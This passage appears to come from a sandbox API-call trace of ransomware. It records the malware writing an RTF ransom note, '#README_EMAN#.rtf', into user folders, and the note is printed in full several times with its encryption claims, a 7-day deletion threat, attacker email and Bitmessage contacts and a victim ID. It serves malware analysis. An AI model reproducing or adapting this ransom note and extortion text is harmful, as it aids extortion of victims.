y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.354] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.354] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.354] CloseHandle (hObject=0x294) returned 1 [0272.354] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\#readme_eman#.rtf")) returned 0xffffffff [0272.354] GetLastError () returned 0x2 [0272.354] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.356] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 